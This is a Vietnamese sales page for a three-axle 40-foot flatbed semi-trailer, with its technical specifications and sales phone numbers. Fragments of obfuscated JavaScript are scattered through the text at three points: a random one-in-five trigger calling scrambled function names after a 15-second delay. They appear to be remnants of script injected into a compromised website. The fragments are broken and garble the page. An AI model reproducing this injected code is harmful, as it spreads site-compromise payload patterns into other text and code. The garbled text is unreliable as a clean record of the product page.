SOMI-ROMOOC SÀN 40 FEET

chi tiet mat san 40ft

THÔNG SỐ KỸ THUẬT SOMI-ROMOOC SÀN 40 FEET ( 3 TRỤC)

Kích thướng tổng thể mm12250 mm x 2495 mm x 1560 mm 
Tự trọngkg8.030
Tổng tải trọngkg38.550
Dầm chínhmm500
Hệ thống treoNhíp 8 lá
Trụckg3 x 13.000 Fuwa
Hệ thống phanhPhanh hơi dây kép
Chân chốngkg28.000Fuwa
Vỏ11.00-20Double coin

 

 


andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}chi tiet mat san 40ft

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Chi tiet san 40ft 2


LIÊN HỆ VỚI CHÚNG TÔI ĐỂ ĐẶT HÀNGandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

Phòng Kinh doanh rơ-mooc TRƯƠNG THANH  (0650) 3786561

Mr. Thanh: (090) 82 80 555    /         Mr. Trưởng : (090) 811 22 50